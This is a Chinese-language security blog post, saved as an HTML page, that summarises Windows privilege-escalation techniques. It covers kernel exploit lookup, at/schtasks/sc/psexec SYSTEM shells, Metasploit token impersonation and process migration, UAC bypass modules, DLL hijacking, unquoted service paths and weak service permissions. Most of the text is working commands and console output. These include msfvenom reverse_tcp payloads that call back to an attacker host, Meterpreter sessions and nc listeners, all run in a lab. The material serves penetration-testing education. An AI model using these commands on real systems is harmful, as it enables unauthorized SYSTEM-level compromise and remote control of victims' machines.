

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>Windows提权方式总结 - M0untainShley</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"ee9387c15cc7097331ccc74141d07081","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>M0untainShley</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Windows提权方式总结">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-12 16:15" pubdate>
        October 12, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      38
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Windows提权方式总结</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：October 22, 2021 pm
                
              </p>
            
            <div class="markdown-body">
              <h3 id="系统内核溢出漏洞提权"><a href="#系统内核溢出漏洞提权" class="headerlink" title="系统内核溢出漏洞提权"></a>系统内核溢出漏洞提权</h3><p>目标系统本身存在一些未打相应补丁的内核溢出漏洞，可利用该漏洞来进行提权</p>
<h4 id="收集系统的补丁信息"><a href="#收集系统的补丁信息" class="headerlink" title="收集系统的补丁信息"></a>收集系统的补丁信息</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 手动收集</span><br>$ systeminfo<br><br>$ Wmic qfe get Caption,Description,HotFixID,InstalledOn<br><br><span class="hljs-comment">#######################################################</span><br><br><span class="hljs-comment"># 工具、自动化收集信息</span><br><br><span class="hljs-comment"># MSF后渗透扫描模块</span><br>$ post/windows/gather/enum_patches  <span class="hljs-comment"># 用来检测目标服务器中已经安装的补丁信息</span><br><br><span class="hljs-comment"># github上的项目</span><br><span class="hljs-comment"># 原理基本上都是从漏洞库查询目标系统的存在的MS/CVE编号，再查询本机上有没有打补丁</span><br>https://github.com/chroblert/WindowsVulnScan<br>https://github.com/AonCyberLabs/Windows-Exploit-Suggester  <span class="hljs-comment"># 项目于2017年停止更新</span><br>https://github.com/vulmon/Vulmap  <span class="hljs-comment"># 对于Windows系统不太友好</span><br>https://github.com/bitsadmin/wesng  <br></code></pre></td></tr></table></figure>



<h4 id="寻找EXP"><a href="#寻找EXP" class="headerlink" title="寻找EXP"></a>寻找EXP</h4><p>在进行目标系统的信息收集之后，可以<strong>利用工具MSF（Metasploit Framework）或者CS（Cobalt Strike）进行提权</strong>，此外，有些EXP未集成在这两款工具之上，那么可以在网上寻找EXP</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>https://github.com/SecWiki/windows-kernel-exploits <br>https://github.com/Ascotbe/Kernelhub<br>https://github.com/offensive-security/exploitdb  <br>https://github.com/nomi-sec/PoC-in-GitHub  <span class="hljs-comment"># 收集了很多exp信息</span><br><br>https://i.hacking8.com/tiquan/  <span class="hljs-comment"># 在线查询可利用的提权漏洞编号</span><br><br><span class="hljs-comment"># MSF后渗透扫描模块</span><br>$ post/multi/recon/local_exploit_suggester  <span class="hljs-comment"># 自动检测msf中针对目标机器可以用来提权的模块</span><br></code></pre></td></tr></table></figure>



<h3 id="计划任务提权"><a href="#计划任务提权" class="headerlink" title="计划任务提权"></a>计划任务提权</h3><h4 id="at命令"><a href="#at命令" class="headerlink" title="at命令"></a>at命令</h4><p>在老版本的Windows系统里，可以使用at命令来创建一个计划任务，该计划任务会创建一个交互式的cmd窗口，权限为system</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 在12:59创建一个交互式、system权限的cmd</span><br>at 12:59 /interactive cmd <br><br><span class="hljs-comment"># 参数解释</span><br><span class="hljs-comment"># /interactive 交互模式运行</span><br></code></pre></td></tr></table></figure>

<p><strong>测试环境，Windows Server 2003 R2</strong></p>
<img src="/img/Windows提权方式总结/8.gif" srcset="/img/loading.gif" lazyload>



<h4 id="schtasks命令"><a href="#schtasks命令" class="headerlink" title="schtasks命令"></a>schtasks命令</h4><p>Win7以及之后的系统中，微软使用schtasks替换了at命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># schtasks命令解读：https://www.cnblogs.com/daimaxuejia/p/12957644.html</span><br>schtasks /create  /tn sys_cmd /sc once /st 15:16 /tr cmd.exe /ru system /f<br><br><span class="hljs-comment"># 参数解释</span><br><span class="hljs-comment"># /create 表示创建计划任务</span><br><span class="hljs-comment"># /tn  taskname 表示任务名，使用绝对路径或者 SYSTEMTOOT/SYSTEM32/下的文件</span><br><span class="hljs-comment"># /sc  schedule 指定计划类型，once 任务在指定的日期和时间运行一次</span><br><span class="hljs-comment"># /st  starttime 是执行时间</span><br><span class="hljs-comment"># /tr  taskrun 指定运行的文件</span><br><span class="hljs-comment"># /ru 使用指定用户帐户的权限运行任务，这里指定为最高的SYSTEM</span><br><span class="hljs-comment"># /f 强制执行，如果任务名已存在，那么覆盖任务</span><br></code></pre></td></tr></table></figure>



<h3 id="SC命令"><a href="#SC命令" class="headerlink" title="SC命令"></a>SC命令</h3><p>SC命令是用来与服务控制管理器和服务进行通信的命令行程序</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#创建一个名叫sys_cmd的新的交互式的cmd执行服务</span><br>sc create sys_cmd binPath= <span class="hljs-string">&quot;cmd /K start&quot;</span> <span class="hljs-built_in">type</span>= own <span class="hljs-built_in">type</span>= interact<br><br><span class="hljs-comment"># 参数解释</span><br><span class="hljs-comment"># create 在注册表和服务控制管理器数据库中为服务创建子项和条目</span><br><span class="hljs-comment"># binpath 指定服务二进制文件的路径</span><br><span class="hljs-comment"># type=own 指定在其自己的进程中运行的服务，它不会与其他服务共享可执行文件，这是默认值</span><br><span class="hljs-comment"># type=interact 指定可与桌面交互的服务，从用户处接收输入</span><br><br><span class="hljs-comment">#运行服务</span><br>sc start sys_cmd<br></code></pre></td></tr></table></figure>

<p><strong>测试环境，Windows Server 2003 R2</strong></p>
<img src="/img/Windows提权方式总结/9.gif" srcset="/img/loading.gif" lazyload>



<h3 id="Psexec"><a href="#Psexec" class="headerlink" title="Psexec"></a>Psexec</h3><p>PsExec 是一种轻量级的telnet替代品，可让您在其他系统上执行进程，并与控制台应用程序完全交互，而无需手动安装客户端软件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 下载和介绍地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec</span><br>psexec.exe -accepteula -s -i -d cmd<br><br><span class="hljs-comment"># 参数解释</span><br><span class="hljs-comment"># -accepteula 该标志禁止显示许可证对话框</span><br><span class="hljs-comment"># -s 以system身份</span><br><span class="hljs-comment"># -i 交互式运行</span><br><span class="hljs-comment"># -d 指定程序</span><br></code></pre></td></tr></table></figure>

<p><strong>测试环境，Windows Server 2008 R2</strong></p>
<img src="/img/Windows提权方式总结/2.gif" srcset="/img/loading.gif" lazyload>



<h3 id="MSF令牌窃取"><a href="#MSF令牌窃取" class="headerlink" title="MSF令牌窃取"></a>MSF令牌窃取</h3><h4 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h4><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Windows Server 2008 R2：192.168.199.205</p>
<h4 id="MSF令牌窃取实战"><a href="#MSF令牌窃取实战" class="headerlink" title="MSF令牌窃取实战"></a>MSF令牌窃取实战</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 生成payload</span><br>$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.123 LPORT=3333 -f exe -o msf.exe<br><br><span class="hljs-comment"># 本地监听</span><br>use exploit/multi/handler<br><span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_tcp<br><span class="hljs-built_in">set</span> lhost 192.168.199.123<br><span class="hljs-built_in">set</span> lport 3333<br>run<br> <br>[*] Started reverse TCP handler on 192.168.199.123:3333<br>[*] Sending stage (175174 bytes) to 192.168.199.205<br>[*] Meterpreter session 1 opened (192.168.199.123:3333 -&gt; 192.168.199.205:49158) at 2021-10-15 09:35:05 +0800<br><br><span class="hljs-comment"># 执行msf.exe，返回一个shell</span><br>meterpreter &gt; getuid<br>Server username: WIN-SP8KQ566UEN\Administrator  <span class="hljs-comment"># Administrator权限</span><br>meterpreter &gt; use incognito  <span class="hljs-comment"># 进入incognito模块</span><br>Loading extension incognito...Success.<br>meterpreter &gt; list_tokens -u  <span class="hljs-comment"># 列出所有用户的令牌</span><br>[-] Warning: Not currently running as SYSTEM, not all tokens will be available<br>Call rev2self <span class="hljs-keyword">if</span> primary process token is SYSTEM<br><br>Delegation Tokens Available<br>========================================<br>NT AUTHORITY\SYSTEM  <span class="hljs-comment"># 有两个用户，Administrator和system</span><br>WIN-SP8KQ566UEN\Administrator<br><br>Impersonation Tokens Available<br>========================================<br>No tokens available<br><br>meterpreter &gt; impersonate_token <span class="hljs-string">&quot;NT AUTHORITY\\SYSTEM&quot;</span>  <span class="hljs-comment"># 伪造&quot;NT AUTHORITY\\SYSTEM&quot;的令牌</span><br>[-] Warning: Not currently running as SYSTEM, not all tokens will be available<br>Call rev2self <span class="hljs-keyword">if</span> primary process token is SYSTEM<br>[+] Delegation token available<br>[+] Successfully impersonated user NT AUTHORITY\SYSTEM<br>meterpreter &gt; getuid  <span class="hljs-comment"># 当前权限提升为system</span><br>Server username: NT AUTHORITY\SYSTEM<br></code></pre></td></tr></table></figure>



<h4 id="低权限用户提权"><a href="#低权限用户提权" class="headerlink" title="低权限用户提权"></a>低权限用户提权</h4><p>当获取到webshell权限为低权限时，可使用MS16-075（烂土豆）配合MSF进行提权</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075">https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075</a></li>
</ul>
<h3 id="进程注入"><a href="#进程注入" class="headerlink" title="进程注入"></a>进程注入</h3><h4 id="pinjextor"><a href="#pinjextor" class="headerlink" title="pinjextor"></a>pinjextor</h4><p>Pinjector 是一种安全工具，允许用户在其他用户的上下文中执行应用程序，此工具在渗透测试中最常使用，以将代码注入已记录的管理员或域管理员进程，并使用其凭据生成 shell下载地址：<a target="_blank" rel="noopener" href="https://www.tarasco.org/security/Process_Injector/">https://www.tarasco.org/security/Process_Injector/</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 被攻击主机</span><br>$ pinjector -l  <span class="hljs-comment"># 查看当前系统的进程以及创建该进程用户</span><br>$ pinjector -p 420 cmd 3333  <span class="hljs-comment"># inject.exe -p &lt;pid&gt; &lt;cmd&gt; &lt;port&gt; (Inject into PID)</span><br><br><span class="hljs-comment"># 攻击主机</span><br>nc &lt;IP&gt; 3333  <span class="hljs-comment"># 监听被攻击主机的IP及端口即可</span><br></code></pre></td></tr></table></figure>

<p><strong>测试环境，Windows Server 2003 R2</strong></p>
<h4 id="MSF进程注入"><a href="#MSF进程注入" class="headerlink" title="MSF进程注入"></a>MSF进程注入</h4><h5 id="环境-1"><a href="#环境-1" class="headerlink" title="环境"></a>环境</h5><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Windows Server 2008 R2：192.168.199.205</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash">...  <span class="hljs-comment"># 省略上线msf过程</span><br>meterpreter &gt; getuid  <span class="hljs-comment"># 当前权限为Administrator</span><br>Server username: WIN-SP8KQ566UEN\Administrator<br>meterpreter &gt; ps  <span class="hljs-comment"># 查看进程列表</span><br>meterpreter &gt; migrate 424  <span class="hljs-comment"># 迁移到424进程上去，该进程为system用户创建的</span><br>[*] Migrating from 3008 to 424...<br>[*] Migration completed successfully.<br>meterpreter &gt; getuid  <span class="hljs-comment"># 提权为system</span><br>Server username: NT AUTHORITY\SYSTEM<br></code></pre></td></tr></table></figure>



<h3 id="Bypass-UAC"><a href="#Bypass-UAC" class="headerlink" title="Bypass UAC"></a>Bypass UAC</h3><p>UAC（UserAccount Control，用户账户控制），是微软在Vista及更高版本windows系统中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的</p>
<h4 id="环境-2"><a href="#环境-2" class="headerlink" title="环境"></a>环境</h4><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Win 7：192.168.199.130</p>
<h4 id="设置UAC"><a href="#设置UAC" class="headerlink" title="设置UAC"></a>设置UAC</h4><p>在Win 7中，[开始]菜单，输入”UAC”，点击”更改用户账户控制设置”，默认选项即为打开UAC</p>
<img src="/img/Windows提权方式总结/1.gif" srcset="/img/loading.gif" lazyload>



<p>在有UAC的存在，提权会变得困难，例如，在我们拿到了Win 7的权限，使用msf的自动提权会出现错误</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">meterpreter &gt; getuid  <span class="hljs-comment"># 当前权限</span><br>Server username: shley-win\shley<br>meterpreter &gt; getsystem  <span class="hljs-comment"># 提权失败</span><br>[-] priv_elevate_getsystem: Operation failed: This <span class="hljs-keyword">function</span> is not supported on this system. The following was attempted:<br>[-] Named Pipe Impersonation (In Memory/Admin)<br>[-] Named Pipe Impersonation (Dropper/Admin)<br>[-] Token Duplication (In Memory/Admin)<br>[-] Named Pipe Impersonation (RPCSS variant)<br></code></pre></td></tr></table></figure>



<h4 id="MSF-Bypass-UAC"><a href="#MSF-Bypass-UAC" class="headerlink" title="MSF Bypass UAC"></a>MSF Bypass UAC</h4><p>在MSF中，我们用到以下模块来进行Bypass UAC，如果遇到不能使用的情况，可以多换几个模块来试试，<strong>使用时注意设置target对应操作系统的型号</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">exploit/windows/<span class="hljs-built_in">local</span>/bypassuac<br>exploit/windows/<span class="hljs-built_in">local</span>/bypassuac_injection<br>exploit/windows/<span class="hljs-built_in">local</span>/bypassuac_eventvwr<br>exploit/windows/<span class="hljs-built_in">local</span>/ask<br></code></pre></td></tr></table></figure>



<p>这里使用exploit/windows/local/ask做为演示</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs bash">meterpreter &gt; background<br>[*] Backgrounding session 1...<br>msf6 &gt; use exploit/windows/<span class="hljs-built_in">local</span>/ask<br>[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp<br>msf6 exploit(windows/<span class="hljs-built_in">local</span>/ask) &gt; show options<br>...<br>msf6 exploit(windows/<span class="hljs-built_in">local</span>/ask) &gt; <span class="hljs-built_in">set</span> session 1<br>session =&gt; 1<br>msf6 exploit(windows/<span class="hljs-built_in">local</span>/ask) &gt; run<br>...<br>meterpreter &gt; getsystem<br>...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).<br>meterpreter &gt; getuid<br>Server username: NT AUTHORITY\SYSTEM<br></code></pre></td></tr></table></figure>

<img src="/img/Windows提权方式总结/3.gif" srcset="/img/loading.gif" lazyload>



<h4 id="Powershell的渗透测试框架-Bypass-UAC"><a href="#Powershell的渗透测试框架-Bypass-UAC" class="headerlink" title="Powershell的渗透测试框架 Bypass UAC"></a>Powershell的渗透测试框架 Bypass UAC</h4><p>可以使用Nishang、PowerSploit以及Empire等Powershell渗透框架也可以，在此不做介绍</p>
<h4 id="UACME项目-Bypass-UAC"><a href="#UACME项目-Bypass-UAC" class="headerlink" title="UACME项目 Bypass UAC"></a>UACME项目 Bypass UAC</h4><p><a target="_blank" rel="noopener" href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></p>
<h3 id="DLL劫持"><a href="#DLL劫持" class="headerlink" title="DLL劫持"></a>DLL劫持</h3><p>在.exe文件执行时，会加载DLL文件，我们可以利用恶意的DLL文件来替换.exe文件运行时加载的DLL文件，达到提权的目的</p>
<h4 id="环境-3"><a href="#环境-3" class="headerlink" title="环境"></a>环境</h4><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Windows Server 2008 R2：192.168.199.205</p>
<h4 id="DLL劫持-1"><a href="#DLL劫持-1" class="headerlink" title="DLL劫持"></a>DLL劫持</h4><p>本次演示我们用到Windows Server 2008R2上的一款.exe可执行文件<strong>，该软件启动时会加载libeay32.dll文件</strong></p>
<img src="/img/Windows提权方式总结/1.png" srcset="/img/loading.gif" lazyload>



<p>打开火绒剑，可以看到该程序在运行时会加载libeay32.dll文件</p>
<img src="/img/Windows提权方式总结/2.png" srcset="/img/loading.gif" lazyload>



<p>msf生成恶意dll文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$  msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.199.123  lport=4444 -f dll -o libeay32.dll<br></code></pre></td></tr></table></figure>



<p>msf执行监听</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ <span class="hljs-built_in">set</span> lhost 192.168.199.123<br>$ <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_tcp<br>$ run<br></code></pre></td></tr></table></figure>



<p>使用生成的恶意dll替换libeay32.dll文件</p>
<img src="/img/Windows提权方式总结/3.png" srcset="/img/loading.gif" lazyload>



<p>运行.exe可执行文件，msf上线</p>
<img src="/img/Windows提权方式总结/4.gif" srcset="/img/loading.gif" lazyload>



<h3 id="可信任服务路径提权"><a href="#可信任服务路径提权" class="headerlink" title="可信任服务路径提权"></a>可信任服务路径提权</h3><h4 id="环境-4"><a href="#环境-4" class="headerlink" title="环境"></a>环境</h4><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Windows Server 2008 R2：192.168.199.205</p>
<h4 id="漏洞原理介绍"><a href="#漏洞原理介绍" class="headerlink" title="漏洞原理介绍"></a>漏洞原理介绍</h4><p>Windows在启动服务对应的二进制文件时，对于该路径中的每一个空格，Windwos都会尝试寻找并执行与空格前面的名字相匹配的程序，例如”C:\Program Files\Unicode.exe”，Windows会依次尝试确定和执行以下程序：</p>
<ul>
<li>C:\Program.exe</li>
<li>C:\Program Files\Unicode.exe</li>
</ul>
<h4 id="可信任服务路径漏洞"><a href="#可信任服务路径漏洞" class="headerlink" title="可信任服务路径漏洞"></a>可信任服务路径漏洞</h4><p>创建vulservice服务，对应的二进制执行文件路径为C:\Program Files\Unicode.exe</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ sc create vulservice binpath= <span class="hljs-string">&quot;C:\Program Files\Unicode.exe&quot;</span> displayname= <span class="hljs-string">&quot;vulservice&quot;</span><br></code></pre></td></tr></table></figure>



<img src="/img/Windows提权方式总结/4.png" srcset="/img/loading.gif" lazyload>



<p>使用win+r，输入”services.msc”打开服务，可以看到刚才添加的服务</p>
<img src="/img/Windows提权方式总结/5.png" srcset="/img/loading.gif" lazyload>



<p>msf构造恶意payload，启动监听</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.199.123  lport=4444 -f exe -o program.exe<br></code></pre></td></tr></table></figure>



<p>启动该服务，msf上线</p>
<img src="/img/Windows提权方式总结/5.gif" srcset="/img/loading.gif" lazyload>



<h3 id="系统权限配置提权"><a href="#系统权限配置提权" class="headerlink" title="系统权限配置提权"></a>系统权限配置提权</h3><h4 id="环境-5"><a href="#环境-5" class="headerlink" title="环境"></a>环境</h4><p>msf Win 10：192.168.199.123</p>
<p>被攻击主机 Windows Server 2008 R2：192.168.199.205</p>
<h4 id="漏洞原理介绍-1"><a href="#漏洞原理介绍-1" class="headerlink" title="漏洞原理介绍"></a>漏洞原理介绍</h4><p>Windows系统服务文件在操作系统启动时加载和执行，并在后台调用可执行文件，<strong>Windows服务是以system权限运行的，因此，当一个低权限用户对此类系统服务调用的可执行文件有写权限，就可以将该文件替换为任意可执行文件，并随着系统服务的启动获得系统权限</strong></p>
<h4 id="MSF利用"><a href="#MSF利用" class="headerlink" title="MSF利用"></a>MSF利用</h4><p>利用msf中的windows/local/service_permissions模块可以对目标主机进行该漏洞的检测和利用，<strong>设置session即可</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs bash">...  <span class="hljs-comment"># 省略拿到shell的过程</span><br>msf6 &gt; use exploit/windows/<span class="hljs-built_in">local</span>/service_permissions  <span class="hljs-comment"># 使用模块</span><br>msf6 exploit(windows/<span class="hljs-built_in">local</span>/service_permissions) &gt; <span class="hljs-built_in">set</span> session 1  <span class="hljs-comment"># 设置session</span><br>session =&gt; 1<br>msf6 exploit(windows/<span class="hljs-built_in">local</span>/service_permissions) &gt; run  <span class="hljs-comment"># 开始执行</span><br><br>[*] Started reverse TCP handler on 192.168.199.123:4444<br>[-] The registry technique will be skipped because the payload architecture does not match the native system architecture<br>[*] Trying to add a new service...<br>[*] Created service... kcmRdKIfYwk<br>[+] Service should be started! Enjoy your new SYSTEM meterpreter 